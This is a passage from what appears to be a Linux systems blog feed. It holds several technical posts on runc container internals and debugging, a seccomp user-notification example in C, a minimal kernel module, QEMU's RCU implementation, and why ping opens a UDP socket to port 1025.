return &os.PathError{Op: "close log pipe", Path: "fd " + strconv.Itoa(l.logFd), Err: err}
}
// Wait for the FIFO to be opened on the other side before exec-ing the
// user process. We open it through /proc/self/fd/$fd, because the fd that
// was given to us was an O_PATH fd to the fifo itself. Linux allows us to
// re-open an O_PATH fd through /proc.
fifoPath := "/proc/self/fd/" + strconv.Itoa(l.fifoFd)
fd, err := unix.Open(fifoPath, unix.O_WRONLY|unix.O_CLOEXEC, 0)
if err != nil {
return &os.PathError{Op: "open exec fifo", Path: fifoPath, Err: err}
}
if _, err := unix.Write(fd, []byte("0")); err != nil {
return &os.PathError{Op: "write exec fifo", Path: fifoPath, Err: err}
}
// Close the O_PATH fifofd fd before exec because the kernel resets
// dumpable in the wrong order. This has been fixed in newer kernels, but
// we keep this to ensure CVE-2016-9962 doesn't re-emerge on older kernels.
// N.B. the core issue itself (passing dirfds to the host filesystem) has
// since been resolved.
// https://github.com/torvalds/linux/blob/v4.9/fs/exec.c#L1290-L1318
_ = unix.Close(l.fifoFd)
s := l.config.SpecState
s.Pid = unix.Getpid()
s.Status = specs.StateCreated
if err := l.config.Config.Hooks[configs.StartContainer].RunHooks(s); err != nil {
return err
}
return system.Exec(name, l.config.Args[0:], os.Environ())
}
</code></pre></div></div>
<p>For now, we can see the runc process is ‘./runc init’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:~/go/src# ps aux | grep runc
root 4239 0.0 0.2 1090192 10400 ? Ssl Dec26 0:00 ./runc init
root 10667 0.0 0.0 14432 1084 pts/0 S+ 05:19 0:00 grep --color=auto runc
root@ubuntu:~/go/src# cat /proc/4239/comm
runc:[2:INIT]
root@ubuntu:/run/runc/test# runc list
ID PID STATUS BUNDLE CREATED OWNER
test 4239 created /home/test/mycontainer 2021-12-25T05:17:30.596712553Z root
</code></pre></div></div>
<p>Now let’s execute ‘runc start test’. We can see following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/run/runc/test# runc start test
root@ubuntu:/run/runc/test# runc list
ID PID STATUS BUNDLE CREATED OWNER
test 4239 running /home/test/mycontainer 2021-12-25T05:17:30.596712553Z root
root@ubuntu:/run/runc/test# runc ps test
UID PID PPID C STIME TTY TIME CMD
root 4239 2709 0 Dec26 ? 00:00:00 sleep 1000
root@ubuntu:/run/runc/test# ls
state.json
</code></pre></div></div>
<p>‘runc start’ calls ‘getContainer’ to get a container object and then calls the container’s ‘Exec()’ method, which calls ‘exec()’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (c *linuxContainer) exec() error {
path := filepath.Join(c.root, execFifoFilename)
pid := c.initProcess.pid()
blockingFifoOpenCh := awaitFifoOpen(path)
for {
select {
case result := <-blockingFifoOpenCh:
return handleFifoResult(result)
case <-time.After(time.Millisecond * 100):
stat, err := system.Stat(pid)
if err != nil || stat.State == system.Zombie {
// could be because process started, ran, and completed between our 100ms timeout and our system.Stat() check.
// see if the fifo exists and has data (with a non-blocking open, which will succeed if the writing process is complete).
if err := handleFifoResult(fifoOpen(path, false)); err != nil {
return errors.New("container process is already dead")
}
return nil
}
}
}
}
</code></pre></div></div>
<p>‘handleFifoResult’ reads data from the exec.fifo pipe, thus unblocking the ‘runc:[2:INIT]’ process, which finally executes the process defined in config.json.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func handleFifoResult(result openResult) error {
if result.err != nil {
return result.err
}
f := result.file
defer f.Close()
if err := readFromExecFifo(f); err != nil {
return err
}
return os.Remove(f.Name())
}
</code></pre></div></div>
runc internals, part 1: usage, build and source architecture2021-12-22T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2021/12/22/runc-internals-1
<p><a href="https://github.com/opencontainers/runc">runc</a> is the foundation of container technology. The idea of a container is simple: put some processes into separate namespaces, use cgroups to restrict these processes’ resource usage, and use overlayfs as the container’s filesystem. So it seems that runc’s work is easy: just prepare the environment for the container process and run it. In reality, it is not so easy. This series will try to do a deep analysis of runc’s internals. This is the first part: how to use and build runc, and runc’s source code architecture.</p>
<h3> install Go </h3>
<p>Download the Go binary from <a href="https://go.dev/dl/">here</a>; we use ‘go1.17.5.linux-amd64.tar.gz’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> wget https://go.dev/dl/go1.17.5.linux-amd64.tar.gz
</code></pre></div></div>
<p>Extract it to /usr/local:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> tar -C /usr/local -xzf go1.17.5.linux-amd64.tar.gz
</code></pre></div></div>
<p>Add the go binary to $PATH and set the GOPATH and GOROOT variables by adding the following lines to ~/.profile:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> export PATH=/usr/local/go/bin:$PATH
export GOROOT=/usr/local/go
export GOPATH=/home/test/go
</code></pre></div></div>
<p>Enable the setting:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> source ~/.profile
mkdir /home/test/go/bin
mkdir /home/test/go/src
mkdir /home/test/go/pkg
</code></pre></div></div>
<h3> build runc </h3>
<p>As per runc’s README.md, first install the libseccomp-dev package:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> apt install libseccomp-dev
</code></pre></div></div>
<p>clone runc:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> mkdir /home/test/go/src/github.com/opencontainers
cd /home/test/go/src/github.com/opencontainers
git clone https://github.com/opencontainers/runc
cd runc
</code></pre></div></div>
<p>Change the following two lines of the runc Makefile, adding <b>-gcflags “-N -l”</b> to disable optimizations and inlining so that debugging works well:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> GO_BUILD := $(GO) build -trimpath $(GO_BUILDMODE) $(EXTRA_FLAGS) -tags "$(BUILDTAGS)" \
-ldflags "-X main.gitCommit=$(COMMIT) -X main.version=$(VERSION) $(EXTRA_LDFLAGS)" -gcflags "-N -l"
GO_BUILD_STATIC := CGO_ENABLED=1 $(GO) build -trimpath $(EXTRA_FLAGS) -tags "$(BUILDTAGS) netgo osusergo" \
-ldflags "-extldflags -static -X main.gitCommit=$(COMMIT) -X main.version=$(VERSION) $(EXTRA_LDFLAGS)" -gcflags "-N -l"
</code></pre></div></div>
<p>build runc</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> make
make install
</code></pre></div></div>
<h3> runc usage </h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # create the top most bundle directory
mkdir /mycontainer
cd /mycontainer
# create the rootfs directory
mkdir rootfs
# export busybox via Docker into the rootfs directory
docker export $(docker create busybox) | tar -C rootfs -xvf -
runc spec
runc run test
</code></pre></div></div>
<p>Now we have a running container.</p>
<p>Let’s debug runc. In order to let gdb find the source directory ‘github.com/opencontainers/runc/’, I copy the ‘runc’ binary to ‘/home/test/go/src’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:~/go/src# gdb --args ./runc run --bundle /home/test/mycontainer/ test
...
(gdb) b main.startContainer
Breakpoint 1 at 0x60d100: file github.com/opencontainers/runc/utils_linux.go, line 374.
(gdb) r
Starting program: /home/test/go/src/runc run --bundle /home/test/mycontainer/ test
....
Thread 1 "runc" hit Breakpoint 1, main.startContainer (context=0xc000144840, action=2 '\002', criuOpts=0x0, ~r3=824635577192, ~r4=...)
at github.com/opencontainers/runc/utils_linux.go:374
374 func startContainer(context *cli.Context, action CtAct, criuOpts *libcontainer.CriuOpts) (int, error) {
(gdb) n
375 if err := revisePidFile(context); err != nil {
(gdb) n
378 spec, err := setupSpec(context)
(gdb) n
379 if err != nil {
(gdb) p spec
$1 = (github.com/opencontainers/runtime-spec/specs-go.Spec *) 0xc000170380
(gdb) p *spec
$2 = {Version = 0xc0002067f0 "1.0.2-dev", Process = 0xc00020c000, Root = 0xc000127e90, Hostname = 0xc0002068b8 "runc", Mounts = {array = 0xc000184580,
len = 7, cap = 9}, Hooks = 0x0, Annotations = 0x0, Linux = 0xc00020c0f0, Solaris = 0x0, Windows = 0x0, VM = 0x0}
(gdb) p *spec.Process
$3 = {Terminal = true, ConsoleSize = 0x0, User = {UID = 0, GID = 0, Umask = 0x0, AdditionalGids = {array = 0x0, len = 0, cap = 0}, Username = 0x0 ""},
Args = {array = 0xc000149440, len = 1, cap = 4}, CommandLine = 0x0 "", Env = {array = 0xc000149480, len = 2, cap = 4}, Cwd = 0x5555561ba178 "/",
Capabilities = 0xc000170400, Rlimits = {array = 0xc000170480, len = 1, cap = 4}, NoNewPrivileges = true, ApparmorProfile = 0x0 "", OOMScoreAdj = 0x0,
SelinuxLabel = 0x0 ""}
(gdb)
</code></pre></div></div>
<h3> runc source architecture </h3>
<p>Following shows the source code architecture of runc</p>
<p><img src="/assets/img/runcinternals1/1.png" alt="" /></p>
<p>The runc binary has several subcommands; each handler lives in a go file in the root directory. The core code of runc is in the libcontainer directory. In the next post I will analyze the runc create and start commands.</p>
<h3> reference </h3>
<p><a href="https://yacanliu.gitee.io/runc-1.html">探索 runC (上)</a></p>
seccomp user notification2021-05-20T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2021/05/20/seccomp-user-notify
<p>seccomp user notification defers seccomp decisions to userspace. The post <a href="https://brauner.github.io/2020/07/23/seccomp-notify.html">Seccomp Notify</a> has a very detailed description of this feature. This <a href="https://man7.org/tlpi/code/online/dist/seccomp/seccomp_user_notification.c.html">page</a> has an example of seccomp. I changed that example to the following: the seccomp BPF filter forwards the decision for the listen syscall to userspace, and the tracer prints the listened port and can block a specified port from being listened on. This is just a PoC and the program doesn’t exit normally.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define _GNU_SOURCE
#include <sys/types.h>
#include <sys/prctl.h>
#include <fcntl.h>
#include <limits.h>
#include <signal.h>
#include <sys/wait.h>
#include <stddef.h>
#include <stdbool.h>
#include <linux/audit.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <sys/ioctl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <netinet/in.h>
#include "scm_functions.h"
#define errExit(msg) do { perror(msg); exit(EXIT_FAILURE); \
} while (0)
static int
seccomp(unsigned int operation, unsigned int flags, void *args)
{
return syscall(__NR_seccomp, operation, flags, args);
}
static int
pidfd_getfd(int pidfd, int targetfd, unsigned int flags)
{
return syscall(438, pidfd, targetfd, flags);
}
static int
pidfd_open(pid_t pid, unsigned int flags)
{
return syscall(__NR_pidfd_open, pid, flags);
}
#define X32_SYSCALL_BIT 0x40000000
#define X86_64_CHECK_ARCH_AND_LOAD_SYSCALL_NR \
BPF_STMT(BPF_LD | BPF_W | BPF_ABS, \
(offsetof(struct seccomp_data, arch))), \
BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 0, 2), \
BPF_STMT(BPF_LD | BPF_W | BPF_ABS, \
(offsetof(struct seccomp_data, nr))), \
BPF_JUMP(BPF_JMP | BPF_JGE | BPF_K, X32_SYSCALL_BIT, 0, 1), \
BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL_PROCESS)
static int
installNotifyFilter(void)
{
struct sock_filter filter[] = {
X86_64_CHECK_ARCH_AND_LOAD_SYSCALL_NR,
/* listen() triggers a notification to the user-space tracer */
BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_listen, 0, 1),
BPF_STMT(BPF_RET + BPF_K, SECCOMP_RET_USER_NOTIF),
/* Every other system call is allowed */
BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
};
struct sock_fprog prog = {
.len = (unsigned short) (sizeof(filter) / sizeof(filter[0])),
.filter = filter,
};
int notifyFd = seccomp(SECCOMP_SET_MODE_FILTER,
SECCOMP_FILTER_FLAG_NEW_LISTENER, &prog);
if (notifyFd == -1)
errExit("seccomp-install-notify-filter");
return notifyFd;
}
static void
closeSocketPair(int sockPair[2])
{
if (close(sockPair[0]) == -1)
errExit("closeSocketPair-close-0");
if (close(sockPair[1]) == -1)
errExit("closeSocketPair-close-1");
}
static pid_t
targetProcess(int sockPair[2], char *argv[])
{
pid_t targetPid;
int notifyFd;
struct sigaction sa;
int s;
int sockfd;
struct sockaddr_in sockaddr;
targetPid = fork();
if (targetPid == -1)
errExit("fork");
if (targetPid > 0) /* In parent, return PID of child */
return targetPid;
printf("Target process: PID = %ld\n", (long) getpid());
if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0))
errExit("prctl");
notifyFd = installNotifyFilter();
if (sendfd(sockPair[0], notifyFd) == -1)
errExit("sendfd");
if (close(notifyFd) == -1)
errExit("close-target-notify-fd");
closeSocketPair(sockPair);
sockfd = socket(AF_INET, SOCK_STREAM, 0);
sockaddr.sin_family = AF_INET;
sockaddr.sin_addr.s_addr = htonl(INADDR_ANY);
sockaddr.sin_port = htons(80);
if (bind(sockfd, (struct sockaddr*)&sockaddr, sizeof(sockaddr)))
errExit("Target process: bind error");
if (listen(sockfd, 1024))
errExit("Target process: listen error");
printf("listen success\n");
}
static void
checkNotificationIdIsValid(int notifyFd, __u64 id, char *tag)
{
if (ioctl(notifyFd, SECCOMP_IOCTL_NOTIF_ID_VALID, &id) == -1) {
fprintf(stderr, "Tracer: notification ID check (%s): "
"target has died!!!!!!!!!!!\n", tag);
}
}
/* Handle notifications that arrive via SECCOMP_RET_USER_NOTIF file
descriptor, 'notifyFd'. */
static void
watchForNotifications(int notifyFd)
{
struct seccomp_notif *req;
struct seccomp_notif_resp *resp;
struct seccomp_notif_sizes sizes;
char path[PATH_MAX];
int procMem; /* FD for /proc/PID/mem of target process */
int pidfd;
int listennum;
int listenfd;
struct sockaddr_in sa;
int salen = sizeof(sa);
if (seccomp(SECCOMP_GET_NOTIF_SIZES, 0, &sizes) == -1)
errExit("Tracer: seccomp-SECCOMP_GET_NOTIF_SIZES");
req = malloc(sizes.seccomp_notif);
if (req == NULL)
errExit("Tracer: malloc");
resp = malloc(sizes.seccomp_notif_resp);
if (resp == NULL)
errExit("Tracer: malloc");
/* Loop handling notifications */
for (;;) {
/* Wait for next notification, returning info in '*req' */
if (ioctl(notifyFd, SECCOMP_IOCTL_NOTIF_RECV, req) == -1)
errExit("Tracer: ioctlSECCOMP_IOCTL_NOTIF_RECV");
printf("Tracer: got notification for PID %d; ID is %llx\n",
req->pid, req->id);
pidfd = pidfd_open(req->pid, 0);
listennum = req->data.args[0];
listenfd = pidfd_getfd(pidfd, listennum, 0);
getsockname(listenfd, &sa, &salen);
printf("Tracer: listen %d port\n", ntohs(sa.sin_port));
resp->id = req->id;
resp->flags = SECCOMP_USER_NOTIF_FLAG_CONTINUE;
resp->error = 0;
resp->val = 0;
if (ioctl(notifyFd, SECCOMP_IOCTL_NOTIF_SEND, resp) == -1) {
if (errno == ENOENT)
printf("Tracer: response failed with ENOENT; perhaps target "
"process's syscall was interrupted by signal?\n");
else
perror("ioctl-SECCOMP_IOCTL_NOTIF_SEND");
}
}
}
static pid_t
tracerProcess(int sockPair[2])
{
pid_t tracerPid;
tracerPid = fork();
if (tracerPid == -1)
errExit("fork");
if (tracerPid > 0) /* In parent, return PID of child */
return tracerPid;
/* Child falls through to here */
printf("Tracer: PID = %ld\n", (long) getpid());
/* Receive the notification file descriptor from the target process */
int notifyFd = recvfd(sockPair[1]);
if (notifyFd == -1)
errExit("recvfd");
closeSocketPair(sockPair); /* We no longer need the socket pair */
/* Handle notifications */
watchForNotifications(notifyFd);
exit(EXIT_SUCCESS); /* NOTREACHED */
}
int main(int argc, char *argv[])
{
pid_t targetPid, tracerPid;
int sockPair[2];
setbuf(stdout, NULL);
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockPair) == -1)
errExit("socketpair");
targetPid = targetProcess(sockPair, &argv[optind]);
tracerPid = tracerProcess(sockPair);
closeSocketPair(sockPair);
waitpid(targetPid, NULL, 0);
printf("Parent: target process has terminated\n");
waitpid(tracerPid, NULL, 0);
exit(EXIT_SUCCESS);
}
</code></pre></div></div>
hello world driver2021-05-12T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2021/05/12/hello-driver
<p>After several years of kernel development, I still can’t remember the template of a driver. So I wrote this post.</p>
<h3> Ubuntu </h3>
<p>Install the kernel headers.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> apt install linux-headers-`uname -r`
</code></pre></div></div>
<p>hello.c</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <linux/module.h>
#include <linux/init.h>
MODULE_LICENSE("GPL");
static int hello_init(void)
{
printk("Hello word\n");
return 0;
}
static void hello_exit(void)
{
printk("Goodbye,Hello word\n");
}
module_init(hello_init);
module_exit(hello_exit);
</code></pre></div></div>
<p>Makefile</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> obj-m+=hello.o
all:
make -C /lib/modules/$(shell uname -r)/build/ M=$(shell pwd) modules
clean:
make -C /lib/modules/$(shell uname -r)/build/ M=$(shell pwd) clean
</code></pre></div></div>
<h3> redhat </h3>
<p>yum install kernel-devel-<code class="language-plaintext highlighter-rouge">uname -r</code></p>
QEMU RCU implementation2021-03-14T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2021/03/14/qemu-rcu
<p>RCU is a synchronization mechanism first used in the Linux kernel. There is also a userspace RCU implementation library called liburcu. In general, RCU is used to protect read-mostly data structures.
This post is about how QEMU implements RCU.</p>
<h3> Overview </h3>
<p>QEMU’s RCU is ported from liburcu. liburcu has several flavors; to be least invasive, QEMU chose the urcu-mb implementation.</p>
<p>The core of QEMU RCU is a global counter named ‘rcu_gp_ctr’ which is used by both readers and updaters.
Every thread has a thread-local ‘ctr’ counter in its ‘rcu_reader_data’ struct.</p>
<p>The updater updates this counter in ‘synchronize_rcu’ to indicate a new version of the resource.
The reader copies ‘rcu_gp_ctr’ into its own ‘ctr’ variable when calling ‘rcu_read_lock’.</p>
<p>When ‘synchronize_rcu’ finds that a reader’s ‘ctr’ is not the same as ‘rcu_gp_ctr’, it sets the ‘rcu_reader_data->waiting’ bool variable; when ‘rcu_read_unlock’ finds this flag set, it triggers an event, notifying ‘synchronize_rcu’ that the reader has left the critical section. The following picture shows the idea of QEMU RCU.</p>
<p><img src="/assets/img/qemurcu/1.png" alt="" /></p>
<p>‘rcu_reader_data’ is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct rcu_reader_data {
/* Data used by both reader and synchronize_rcu() */
unsigned long ctr;
bool waiting;
/* Data used by reader only */
unsigned depth;
/* Data used for registry, protected by rcu_registry_lock */
QLIST_ENTRY(rcu_reader_data) node;
};
</code></pre></div></div>
<h3> Initialization </h3>
<p>Every thread that uses RCU needs to call ‘rcu_register_thread’ to insert its thread-local ‘rcu_reader’ variable into the global registry list.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void rcu_register_thread(void)
{
assert(rcu_reader.ctr == 0);
qemu_mutex_lock(&rcu_registry_lock);
QLIST_INSERT_HEAD(&registry, &rcu_reader, node);
qemu_mutex_unlock(&rcu_registry_lock);
}
</code></pre></div></div>
<h3> Read side </h3>
<p>‘rcu_read_lock’ is used by the reader. ‘rcu_reader->depth’ handles the nested-lock case. Here we can see it copies ‘rcu_gp_ctr’ into ‘rcu_reader->ctr’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static inline void rcu_read_lock(void)
{
struct rcu_reader_data *p_rcu_reader = &rcu_reader;
unsigned ctr;
if (p_rcu_reader->depth++ > 0) {
return;
}
ctr = qatomic_read(&rcu_gp_ctr);
qatomic_set(&p_rcu_reader->ctr, ctr);
/* Write p_rcu_reader->ctr before reading RCU-protected pointers. */
smp_mb_placeholder();
}
</code></pre></div></div>
<p>‘rcu_read_unlock’ is used by the reader when it leaves the critical section. It resets ‘rcu_reader->ctr’ to 0, and if it finds ‘rcu_reader->waiting’ set, it signals ‘rcu_gp_event’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static inline void rcu_read_unlock(void)
{
struct rcu_reader_data *p_rcu_reader = &rcu_reader;
assert(p_rcu_reader->depth != 0);
if (--p_rcu_reader->depth > 0) {
return;
}
/* Ensure that the critical section is seen to precede the
* store to p_rcu_reader->ctr. Together with the following
* smp_mb_placeholder(), this ensures writes to p_rcu_reader->ctr
* are sequentially consistent.
*/
qatomic_store_release(&p_rcu_reader->ctr, 0);
/* Write p_rcu_reader->ctr before reading p_rcu_reader->waiting. */
smp_mb_placeholder();
if (unlikely(qatomic_read(&p_rcu_reader->waiting))) {
qatomic_set(&p_rcu_reader->waiting, false);
qemu_event_set(&rcu_gp_event);
}
}
</code></pre></div></div>
<h3> Write side </h3>
<p>The updater calls ‘call_rcu’, which inserts a node into the RCU thread’s queue. The thread function ‘call_rcu_thread’ processes this queue and calls ‘synchronize_rcu’. In the common case, it increments ‘rcu_gp_ctr’ and calls ‘wait_for_readers’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void synchronize_rcu(void)
{
QEMU_LOCK_GUARD(&rcu_sync_lock);
/* Write RCU-protected pointers before reading p_rcu_reader->ctr.
* Pairs with smp_mb_placeholder() in rcu_read_lock().
*/
smp_mb_global();
QEMU_LOCK_GUARD(&rcu_registry_lock);
if (!QLIST_EMPTY(&registry)) {
/* In either case, the qatomic_mb_set below blocks stores that free
* old RCU-protected pointers.
*/
if (sizeof(rcu_gp_ctr) < 8) {
...
} else {
/* Increment current grace period. */
qatomic_mb_set(&rcu_gp_ctr, rcu_gp_ctr + RCU_GP_CTR);
}
wait_for_readers();
}
}
</code></pre></div></div>
<p>‘rcu_gp_ongoing’ checks whether a reader is still in a critical section that started under an older grace period. If so, the new ‘rcu_gp_ctr’ will not match ‘rcu_reader_data->ctr’, and ‘wait_for_readers’ sets ‘rcu_reader_data->waiting’ to true. Once ‘registry’ is empty, all readers have left their critical sections; no reader holds the old version of the pointer, and the RCU thread can invoke the callbacks that were inserted into the RCU queue.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void wait_for_readers(void)
{
ThreadList qsreaders = QLIST_HEAD_INITIALIZER(qsreaders);
struct rcu_reader_data *index, *tmp;
for (;;) {
/* We want to be notified of changes made to rcu_gp_ongoing
* while we walk the list.
*/
qemu_event_reset(&rcu_gp_event);
/* Instead of using qatomic_mb_set for index->waiting, and
* qatomic_mb_read for index->ctr, memory barriers are placed
* manually since writes to different threads are independent.
* qemu_event_reset has acquire semantics, so no memory barrier
* is needed here.
*/
QLIST_FOREACH(index, &registry, node) {
qatomic_set(&index->waiting, true);
}
/* Here, order the stores to index->waiting before the loads of
* index->ctr. Pairs with smp_mb_placeholder() in rcu_read_unlock(),
* ensuring that the loads of index->ctr are sequentially consistent.
*/
smp_mb_global();
QLIST_FOREACH_SAFE(index, &registry, node, tmp) {
if (!rcu_gp_ongoing(&index->ctr)) {
QLIST_REMOVE(index, node);
QLIST_INSERT_HEAD(&qsreaders, index, node);
/* No need for mb_set here, worst of all we
* get some extra futex wakeups.
*/
qatomic_set(&index->waiting, false);
}
}
if (QLIST_EMPTY(&registry)) {
break;
}
/* Wait for one thread to report a quiescent state and try again.
* Release rcu_registry_lock, so rcu_(un)register_thread() doesn't
* wait too much time.
*
* rcu_register_thread() may add nodes to &registry; it will not
* wake up synchronize_rcu, but that is okay because at least another
* thread must exit its RCU read-side critical section before
* synchronize_rcu is done. The next iteration of the loop will
* move the new thread's rcu_reader from &registry to &qsreaders,
* because rcu_gp_ongoing() will return false.
*
* rcu_unregister_thread() may remove nodes from &qsreaders instead
* of &registry if it runs during qemu_event_wait. That's okay;
* the node then will not be added back to &registry by QLIST_SWAP
* below. The invariant is that the node is part of one list when
* rcu_registry_lock is released.
*/
qemu_mutex_unlock(&rcu_registry_lock);
qemu_event_wait(&rcu_gp_event);
qemu_mutex_lock(&rcu_registry_lock);
}
/* put back the reader list in the registry */
QLIST_SWAP(&registry, &qsreaders, node);
}
static inline int rcu_gp_ongoing(unsigned long *ctr)
{
unsigned long v;
v = qatomic_read(ctr);
return v && (v != rcu_gp_ctr);
}
</code></pre></div></div>
Why ping uses UDP port 10252021-02-19T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2021/02/19/ping-1025
<p>Recently I noticed that the ping source code has an interesting trick.
It creates a UDP socket and connects it to the destination using port 1025. The code is <a href="https://github.com/iputils/iputils/blob/master/ping/ping.c#L707">here</a>.</p>
<p>At first glance this is strange, as we know ping just uses ICMP to check the connectivity between two IPs.</p>
<p>So let’s see what happens.</p>
<p>In one terminal we use tcpdump to capture the packet.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test# tcpdump -nn -vv host 8.8.8.8
</code></pre></div></div>
<p>In another terminal we strace the ping.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:~$ strace -o ping.txt ping 8.8.8.8 -c 1
</code></pre></div></div>
<p>After ping terminates, we can see tcpdump captured no packet related to port 1025.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test# tcpdump -nn -vv host 8.8.8.8
tcpdump: listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
07:29:19.390097 IP (tos 0x0, ttl 64, id 9390, offset 0, flags [DF], proto ICMP (1), length 84)
192.168.80.146 > 8.8.8.8: ICMP echo request, id 2, seq 1, length 64
07:29:19.688639 IP (tos 0x0, ttl 128, id 44019, offset 0, flags [none], proto ICMP (1), length 84)
8.8.8.8 > 192.168.80.146: ICMP echo reply, id 2, seq 1, length 64
</code></pre></div></div>
<p>Let’s see the strace log.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> socket(AF_INET, SOCK_DGRAM, IPPROTO_IP) = 5
connect(5, {sa_family=AF_INET, sin_port=htons(1025), sin_addr=inet_addr("8.8.8.8")}, 16) = 0
getsockname(5, {sa_family=AF_INET, sin_port=htons(43043), sin_addr=inet_addr("192.168.80.146")}, [16]) = 0
close(5) = 0
</code></pre></div></div>
<p>UDP port 1025 never appears on the wire; there are only the socket/connect/getsockname/close syscalls.</p>
<p>After searching the internet, I found this is a trick to get the source IP that the ping program will use.</p>
<p>Port 1025 is only used when no source IP is specified. If we specify the source IP, there is no connect call in the strace log.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:~$ strace -o ping.txt ping -I 192.168.80.146 8.8.8.8 -c 1
</code></pre></div></div>
<p>Finally, let’s look into the kernel.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> SYSCALL_DEFINE3(connect, int, fd, struct sockaddr __user *, uservaddr,
int, addrlen)
{
return __sys_connect(fd, uservaddr, addrlen);
}
__sys_connect
->__sys_connect_file
->sock->ops->connect(inet_dgram_connect)
->sk->sk_prot->connect(ip4_datagram_connect)
->__ip4_datagram_connect
->ip_route_connect
->ip_route_connect_init
->__ip_route_output_key
->ip_route_output_key_hash
->ip_route_output_key_hash_rcu
->flowi4_update_output
->ip_route_output_flow
</code></pre></div></div>
<p>It seems that ‘ip_route_output_key_hash_rcu’ chooses the source address.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ip_route_output_key_hash_rcu
if (!fl4->saddr) {
if (ipv4_is_multicast(fl4->daddr))
fl4->saddr = inet_select_addr(dev_out, 0,
fl4->flowi4_scope);
else if (!fl4->daddr)
fl4->saddr = inet_select_addr(dev_out, 0,
RT_SCOPE_HOST);
}
__ip4_datagram_connect
if (!inet->inet_saddr)
inet->inet_saddr = fl4->saddr; /* Update source address */
</code></pre></div></div>
<p>In the getsockname syscall, we can see it returns the source IP from ‘inet->inet_saddr’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int inet_getname(struct socket *sock, struct sockaddr *uaddr,
int peer)
{
struct sock *sk = sock->sk;
struct inet_sock *inet = inet_sk(sk);
DECLARE_SOCKADDR(struct sockaddr_in *, sin, uaddr);
sin->sin_family = AF_INET;
if (peer) {
...
} else {
__be32 addr = inet->inet_rcv_saddr;
if (!addr)
addr = inet->inet_saddr;
sin->sin_port = inet->inet_sport;
sin->sin_addr.s_addr = addr;
}
...
}
EXPORT_SYMBOL(inet_getname);
</code></pre></div></div>
<h3> Reference </h3>
<p>https://echorand.me/posts/my-own-ping/</p>
<p>https://jeffpar.github.io/kbarchive/kb/129/Q129065/</p>
<p>https://github.com/iputils/iputils/issues/125</p>
<p>https://stackoverflow.com/questions/25879280/getting-my-own-ip-address-by-connecting-using-udp-socket</p>
kvm performance optimization technologies, part two2020-10-01T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/10/01/kvm-performance-2
<p>In full virtualization the guest OS isn’t aware that it is running in a VM. If the OS knows it is running in a VM, it can do some optimizations to improve performance. This is called para-virtualization (PV). Generally speaking,
any technology in the guest OS that is based on the assumption that it is running in a VM can be called a PV technology. For example, virtio is a PV framework, and <a href="https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/03/24/kvm-async-page-fault">apf</a> is also a PV feature. However, in this post I will not talk about these more complicated features but about some smaller PV performance optimizations.</p>
